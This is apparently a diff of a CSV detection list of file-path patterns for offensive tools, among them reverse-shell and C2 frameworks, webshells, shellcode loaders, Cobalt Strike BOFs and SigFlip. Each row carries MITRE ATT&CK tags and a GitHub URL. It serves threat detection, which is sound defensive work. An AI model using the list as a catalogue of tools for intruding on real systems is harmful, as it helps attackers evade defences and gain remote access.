+"*/Shellcode-Loader.git*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" "*/shellcodes/utils.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/shellcodetester*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" -"*/ShellGhost.git*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","892","102","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*/ShellGhost.git*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" "*/shellinject*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*/ShellPop*","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. 
With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","10","1393","237","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z" "*/Shells/shell.aspx*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" 
@@ -5236,34 +5292,34 @@ "*/Shells/shell.sh*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" "*/Shells/tomcat.war*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" "*/Shells/wordpress.zip*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. 
Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" -"*/shellshock.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/shellshock.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/sherlocksecurity/*","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Shhmon/*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" -"*/ShimsInstaller.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ShimsInstaller.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/shocknawe/*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" "*/shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/shspawnas/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 
- TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/shspawnas/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*/ShuckNT.git*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. 
It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" "*/si1ent-le/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z" -"*/SigFlip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" -"*/SigFlip/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
-"*/SigLoader.go*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
-"*/SigLoader/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
-"*/SigLoader/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","884","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/SigFlip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/SigFlip/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/SigLoader.go*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
+"*/SigLoader/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z"
